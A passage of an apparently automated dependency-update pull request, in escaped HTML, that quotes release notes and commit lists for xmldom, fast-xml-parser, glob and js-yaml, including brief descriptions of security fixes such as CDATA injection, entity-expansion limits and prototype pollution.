href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.7\"\u003e0.9.8\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: replace \\u2029 as part of normalizeLineEndings \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/839\"\u003e\u003ccode\u003e[#839](https://github.com/xmldom/xmldom/issues/839)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eperf: speed up line detection \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/847\"\u003e\u003ccode\u003e[#847](https://github.com/xmldom/xmldom/issues/847)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003cli\u003edrop jazzer and rxjs devDependencies \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/845\"\u003e\u003ccode\u003e[#845](https://github.com/xmldom/xmldom/issues/845)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/kboshold\"\u003e\u003ccode\u003e@​kboshold\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/Ponynjaa\"\u003e\u003ccode\u003e@​Ponynjaa\u003c/code\u003e\u003c/a\u003e,\nfor your contributions.\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.6...0.9.7\"\u003e0.9.7\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImplementation of \u003ccode\u003ehasAttributes\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/804\"\u003e\u003ccode\u003e[#804](https://github.com/xmldom/xmldom/issues/804)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003elocator is now true even when other options are being used for the DOMParser \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/802\"\u003e\u003ccode\u003e[#802](https://github.com/xmldom/xmldom/issues/802)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/803\"\u003e\u003ccode\u003e[#803](https://github.com/xmldom/xmldom/issues/803)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/189cb78a83e81e1515880988a399e863a8be85ac\"\u003e\u003ccode\u003e189cb78\u003c/code\u003e\u003c/a\u003e 0.8.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ed08df7572f4236d4fd88d16063c3fd8f59c7884\"\u003e\u003ccode\u003eed08df7\u003c/code\u003e\u003c/a\u003e fix: XML injection via unsafe CDATA serialization (GHSA-wh4c-j3r5-mjhp) (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/a5b929ba008f067eeabb427c38de008e36a92796\"\u003e\u003ccode\u003ea5b929b\u003c/code\u003e\u003c/a\u003e chore: clean up generated test artefacts before running ci-local\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/4e37a205627a08eb64365b13c4e4cce5e86278cb\"\u003e\u003ccode\u003e4e37a20\u003c/code\u003e\u003c/a\u003e ci: run format:check in lint job\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac0ac7714f0e5a7bd7aff5c30f7733666cf03982\"\u003e\u003ccode\u003eac0ac77\u003c/code\u003e\u003c/a\u003e chore: ignore generated files when checking formatting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/968c8939438eec2eca1d003b333cd0fc4595c72d\"\u003e\u003ccode\u003e968c893\u003c/code\u003e\u003c/a\u003e chore: add local CI script and format:check script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac40424adfa49429811095bcdaf6598255a81a39\"\u003e\u003ccode\u003eac40424\u003c/code\u003e\u003c/a\u003e fix: preserve trailing whitespace in ProcessingInstruction data (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cece7521a3c77da7a10f3fc66521e3e077c9974c\"\u003e\u003ccode\u003ecece752\u003c/code\u003e\u003c/a\u003e chore: add .nvmrc pointing to node version 18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbf44d90a40703237d217598fa0bcd88770bfa0b\"\u003e\u003ccode\u003ecbf44d9\u003c/code\u003e\u003c/a\u003e docs: improve links to changes in most recent release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c0f14011c7cf93af60b2541898065b7136594f6b\"\u003e\u003ccode\u003ec0f1401\u003c/code\u003e\u003c/a\u003e 0.8.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-xml-parser` from 4.2.2 to 5.5.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003efix typins and matcher instance in callbacks\u003c/h2\u003e\n\u003cp\u003ecombine typings file to avoid configuration changes\npass readonly instance of matcher to the call backs to avoid accidental push/pop call\u003c/p\u003e\n\u003ch2\u003efix bugs of entity parsing and value parsing\u003c/h2\u003e\n\u003cp\u003efix: entity expansion limits\nupdate strnum package to 2.2.0\u003c/p\u003e\n\u003ch2\u003efix entity expansion and incorrect replacement and performance\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003esupport onDangerousProperty\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eupdate dependecies to fix typings\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eintegrate path-expression-matcher\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eSeparate Builder\u003c/h2\u003e\n\u003cp\u003eXML Builder was the part of \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-builder\"\u003efast-xml-parser\u003c/a\u003e for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.\u003c/p\u003e\n\u003ch2\u003eMigration\u003c/h2\u003e\n\u003cp\u003eTo migrate to fast-xml-builder;\u003c/p\u003e\n\u003cp\u003eFrom\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { XMLBuilder } from \u0026quot;fast-xml-parser\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport  XMLBuilder  from \u0026quot;fast-xml-builder\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eXMLBuilder will be removed from current package in any next major version of this library. So better to migrate.\u003c/p\u003e\n\u003ch2\u003esupport strictReservedNames\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ehandle non-array input for XML builder \u0026amp;\u0026amp; support maxNestedTags\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle non-array input for XML builder when preserveOrder is true (By \u003ca href=\"https://github.com/Angelopvtac\"\u003eAngelo Coetzee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esave use of js properies\n\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.7...v5.3.8\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003efast-xml-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003eNote: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003cp\u003eNote: Due to some last quick changes on v4, detail of v4.5.3 \u0026amp; v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.9 / 2026-03-23\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecombine typing files\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e4.5.5 / 2026-03-22\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eapply fixes from v5 (legacy maintenance branch v4-maintenance)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esupport maxEntityCount\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty\u003c/li\u003e\n\u003cli\u003esupport maxNestedTags\u003c/li\u003e\n\u003cli\u003ehandle prototype pollution\u003c/li\u003e\n\u003cli\u003efix incorrect entity name replacement\u003c/li\u003e\n\u003cli\u003efix incorrect condition for entity expansion\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.8 / 2026-03-20\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003epass read only matcher in callback\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.7 / 2026-03-19\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix: entity expansion limits\u003c/li\u003e\n\u003cli\u003eupdate strnum package to 2.2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.6 / 2026-03-16\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate builder dependency\u003c/li\u003e\n\u003cli\u003efix incorrect regex to replace . in entity name\u003c/li\u003e\n\u003cli\u003efix check for entitiy expansion for lastEntities and html entities too\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.5 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esanitize dangerous tag or attribute name\u003c/li\u003e\n\u003cli\u003eerror on critical property name\u003c/li\u003e\n\u003cli\u003esupport onDangerousProperty option\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.4 / 2026-03-13\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeclare Matcher \u0026amp; Expression as unknown so user is not forced to install path-expression-matcher\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.3 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupgrade builder\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.2 / 2026-03-11\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate dependency to fix typings\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e5.5.1 / 2026-03-10\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix dependency\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a8934f903054c582b8ae6a12937fd4b22c380613\"\u003e\u003ccode\u003ea8934f9\u003c/code\u003e\u003c/a\u003e upgrade strnum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/23d13e40c35386069eec8e28c8bfdaabc3962680\"\u003e\u003ccode\u003e23d13e4\u003c/code\u003e\u003c/a\u003e combine typing files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/0c0a7dc500983c549c2b1c9e1987dfabc69eddda\"\u003e\u003ccode\u003e0c0a7dc\u003c/code\u003e\u003c/a\u003e update maintenance docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a92a665e00c146a4ea3ff7760f3399e5ed51dfc5\"\u003e\u003ccode\u003ea92a665\u003c/code\u003e\u003c/a\u003e pass read only matcher in call back\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/a21c44123cdf0f8fb5b56d33386ed3be4e180953\"\u003e\u003ccode\u003ea21c441\u003c/code\u003e\u003c/a\u003e update package detail\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7\"\u003e\u003ccode\u003e239b64a\u003c/code\u003e\u003c/a\u003e check for min value for entity exapantion options\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/61cb666d13044b483aa495a6c020789f22e670b4\"\u003e\u003ccode\u003e61cb666\u003c/code\u003e\u003c/a\u003e restrict more properties to be unsafe\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/41abd66adc54cbc6ebea615a9f5396d8582afdb1\"\u003e\u003ccode\u003e41abd66\u003c/code\u003e\u003c/a\u003e performance improvement of reading DOCTYPE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/3dfcd20c8cffc310335510ff72a211be0672a8dd\"\u003e\u003ccode\u003e3dfcd20\u003c/code\u003e\u003c/a\u003e refactor: performance improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/870043e75e78545192bc70950c6286d36c7cdf23\"\u003e\u003ccode\u003e870043e\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v5.5.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca 